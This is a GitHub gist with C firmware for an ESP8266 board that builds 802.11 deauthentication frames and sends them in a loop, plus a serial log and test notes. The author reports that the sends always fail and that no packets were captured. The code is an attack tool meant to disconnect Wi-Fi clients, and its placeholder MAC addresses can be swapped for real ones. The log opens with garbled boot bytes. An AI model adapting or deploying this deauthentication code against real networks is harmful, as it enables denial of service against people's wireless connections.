Created
November 2, 2015 17:56
-
-
Save stickytruth/91590343c9fce594479f to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| rl��r��#�n����p�<�b�$�rrp�l�����p��n�`rn|��n�܀�r����~�n���l`��#�n��;nr���;��?��rp�n���pp��<����b�ľ~�n�����rnr���;��?�l��r��l`�don't use rtc mem data | |
| r� | |
| SDK version:1.4.0 | |
| mode : sta(5c:cf:7f:01:5b:09) | |
| add if0 | |
| 0 = wifi_register_send_pkt_freedom_cb() | |
| -1 = wifi_send_pkt_freedom(C0:00:00:00:63:6C:69:65:6E:74:61:70:6F:69:6E:74:61:70:6F:69:6E:74:10:00:07:00, 26, 0) | |
| -1 = wifi_send_pkt_freedom(C0:00:00:00:63:6C:69:65:6E:74:61:70:6F:69:6E:74:61:70:6F:69:6E:74:20:00:07:00, 26, 0) | |
| -1 = wifi_send_pkt_freedom(C0:00:00:00:63:6C:69:65:6E:74:61:70:6F:69:6E:74:61:70:6F:69:6E:74:30:00:07:00, 26, 0) | |
| -1 = wifi_send_pkt_freedom(C0:00:00:00:63:6C:69:65:6E:74:61:70:6F:69:6E:74:61:70:6F:69:6E:74:40:00:07:00, 26, 0) | |
| -1 = wifi_send_pkt_freedom(C0:00:00:00:63:6C:69:65:6E:74:61:70:6F:69:6E:74:61:70:6F:69:6E:74:50:00:07:00, 26, 0) | |
| -1 = wifi_send_pkt_freedom(C0:00:00:00:63:6C:69:65:6E:74:61:70:6F:69:6E:74:61:70:6F:69:6E:74:60:00:07:00, 26, 0) | |
| -1 = wifi_send_pkt_freedom(C0:00:00:00:63:6C:69:65:6E:74:61:70:6F:69:6E:74:61:70:6F:69:6E:74:70:00:07:00, 26, 0) | |
| -1 = wifi_send_pkt_freedom(C0:00:00:00:63:6C:69:65:6E:74:61:70:6F:69:6E:74:61:70:6F:69:6E:74:80:00:07:00, 26, 0) | |
| -1 = wifi_send_pkt_freedom(C0:00:00:00:63:6C:69:65:6E:74:61:70:6F:69:6E:74:61:70:6F:69:6E:74:90:00:07:00, 26, 0) | |
| -1 = wifi_send_pkt_freedom(C0:00:00:00:63:6C:69:65:6E:74:61:70:6F:69:6E:74:61:70:6F:69:6E:74:A0:00:07:00, 26, 0) | |
| -1 = wifi_send_pkt_freedom(C0:00:00:00:63:6C:69:65:6E:74:61:70:6F:69:6E:74:61:70:6F:69:6E:74:B0:00:07:00, 26, 0) | |
| -1 = wifi_send_pkt_freedom(C0:00:00:00:63:6C:69:65:6E:74:61:70:6F:69:6E:74:61:70:6F:69:6E:74:C0:00:07:00, 26, 0) | |
| -1 = wifi_send_pkt_freedom(C0:00:00:00:63:6C:69:65:6E:74:61:70:6F:69:6E:74:61:70:6F:69:6E:74:D0:00:07:00, 26, 0) | |
| -1 = wifi_send_pkt_freedom(C0:00:00:00:63:6C:69:65:6E:74:61:70:6F:69:6E:74:61:70:6F:69:6E:74:E0:00:07:00, 26, 0) | |
| -1 = wifi_send_pkt_freedom(C0:00:00:00:63:6C:69:65:6E:74:61:70:6F:69:6E:74:61:70:6F:69:6E:74:F0:00:07:00, 26, 0) | |
| -1 = wifi_send_pkt_freedom(C0:00:00:00:63:6C:69:65:6E:74:61:70:6F:69:6E:74:61:70:6F:69:6E:74:01:01:07:00, 26, 0) | |
| -1 = wifi_send_pkt_freedom(C0:00:00:00:63:6C:69:65:6E:74:61:70:6F:69:6E:74:61:70:6F:69:6E:74:11:01:07:00, 26, 0) | |
| -1 = wifi_send_pkt_freedom(C0:00:00:00:63:6C:69:65:6E:74:61:70:6F:69:6E:74:61:70:6F:69:6E:74:21:01:07:00, 26, 0) | |
| -1 = wifi_send_pkt_freedom(C0:00:00:00:63:6C:69:65:6E:74:61:70:6F:69:6E:74:61:70:6F:69:6E:74:31:01:07:00, 26, 0) | |
| -1 = wifi_send_pkt_freedom(C0:00:00:00:63:6C:69:65:6E:74:61:70:6F:69:6E:74:61:70:6F:69:6E:74:41:01:07:00, 26, 0) | |
| -1 = wifi_send_pkt_freedom(C0:00:00:00:63:6C:69:65:6E:74:61:70:6F:69:6E:74:61:70:6F:69:6E:74:51:01:07:00, 26, 0) | |
| -1 = wifi_send_pkt_freedom(C0:00:00:00:63:6C:69:65:6E:74:61:70:6F:69:6E:74:61:70:6F:69:6E:74:61:01:07:00, 26, 0) | |
| -1 = wifi_send_pkt_freedom(C0:00:00:00:63:6C:69:65:6E:74:61:70:6F:69:6E:74:61:70:6F:69:6E:74:71:01:07:00, 26, 0) | |
| -1 = wifi_send_pkt_freedom(C0:00:00:00:63:6C:69:65:6E:74:61:70:6F:69:6E:74:61:70:6F:69:6E:74:81:01:07:00, 26, 0) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Hardware: Adafruit Huzzah, uses the ai-thinker ESP-12 | |
| Environment: Both Espressif SDK and esp-open-sdk | |
| Testing: Tcpdump captures in linux using a usb wifi card in monitor mode and in osx using built-in wifi in monitor mode. | |
| There was minimal wifi traffic during tests, basically 1 AP and 2-3 clients on the channel. | |
| Results: No traffic was seen from the esp. |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include "ets_sys.h" | |
| #include "osapi.h" | |
| #include "gpio.h" | |
| #include "os_type.h" | |
| #include "mem.h" | |
| #include "user_config.h" | |
| #include "user_interface.h" | |
| #include "driver/uart.h" | |
| #define user_procTaskPrio 0 | |
| #define user_procTaskQueueLen 1 | |
| os_event_t user_procTaskQueue[user_procTaskQueueLen]; | |
| static volatile os_timer_t deauth_timer; | |
| uint16_t seq_n = 0; | |
| // Packet buffer | |
| uint8_t packet_buffer[64]; | |
| // Pre-formed packet | |
| uint8_t deauth_packet[26] = {0xC0, 0x00, // Subtype | |
| 0x00, 0x00, // Duration | |
| 0x63, 0x6c, 0x69, 0x65, 0x6e, 0x74, // Client MAC | |
| 0x61, 0x70, 0x6f, 0x69, 0x6e, 0x74, // AP MAC | |
| 0x61, 0x70, 0x6f, 0x69, 0x6e, 0x74, // AP MAC | |
| 0x00, 0x00, // Sequence | |
| 0x07, 0x00}; // Reason code | |
| uint16_t deauth_size = 26; | |
| /* A utility to print buffers */ | |
| void print_buffer(uint8_t *buf, uint16_t start, uint16_t len) { | |
| int i; | |
| for (i = start; i < len; i++) { | |
| if (i > 0) os_printf(":"); | |
| os_printf("%02X", buf[i]); | |
| } | |
| } | |
| /* Copies deauth_packet into buf */ | |
| void write_packet(uint8_t *buf, uint16_t seq) | |
| { | |
| uint8_t i=0; | |
| for (i=0; i<26; i++) buf[i] = deauth_packet[i]; | |
| /* I got desparate for any output here. | |
| Still didn't observer any traffic. | |
| buf[0] = seq / 0xFF; | |
| buf[1] = seq % 0xFF; | |
| */ | |
| buf[22] = seq % 0xFF; | |
| buf[23] = seq / 0xFF; | |
| } | |
| /* Sends deauth packets. */ | |
| void deauth()//void *arg) | |
| { | |
| // Sequence number is increased by 16, see 802.11 | |
| seq_n = seq_n + 0x10; | |
| if (seq_n > 0x2fc) seq_n = 0x00; // 764 | |
| write_packet(packet_buffer, seq_n); | |
| os_printf("%d = wifi_send_pkt_freedom(", wifi_send_pkt_freedom(packet_buffer, deauth_size, 0)); | |
| print_buffer(packet_buffer, 0, deauth_size); | |
| os_printf(", %d, 0)\n", deauth_size); | |
| // wifi_send_pkt_freedom has always returned -1 (fail) | |
| } | |
| /* Callback for sent packets | |
| From the docs: | |
| Note: | |
| Only after the previous packet was sent, entered the freedom_outside_cb_t, | |
| the next packet is allowed to send. | |
| I've never seen this get called. | |
| */ | |
| //void ICACHE_FLASH_ATTR callback_send_pkt_freedom(uint8 status) | |
| void callback_send_pkt_freedom(uint8 status) | |
| { | |
| os_printf_plus("[pkt-cb] %d", status); | |
| } | |
| void ICACHE_FLASH_ATTR | |
| callback_system_init_done(void) | |
| { | |
| // Set channel | |
| wifi_set_channel(1); | |
| // Register callback for sent packets | |
| os_printf("%d = wifi_register_send_pkt_freedom_cb()\n", wifi_register_send_pkt_freedom_cb(callback_send_pkt_freedom)); | |
| // Has always returned 0 (succeed) for me | |
| } | |
| void ICACHE_FLASH_ATTR | |
| user_init() | |
| { | |
| uart_init(115200, 115200); | |
| os_printf("\n\nSDK version:%s\n", system_get_sdk_version()); | |
| wifi_set_opmode(STATION_MODE); | |
| os_timer_disarm(&deauth_timer); | |
| os_timer_setfn(&deauth_timer, (os_timer_func_t *) deauth, NULL); | |
| os_timer_arm(&deauth_timer, CHANNEL_HOP_INTERVAL, 1); | |
| system_init_done_cb(callback_system_init_done); | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment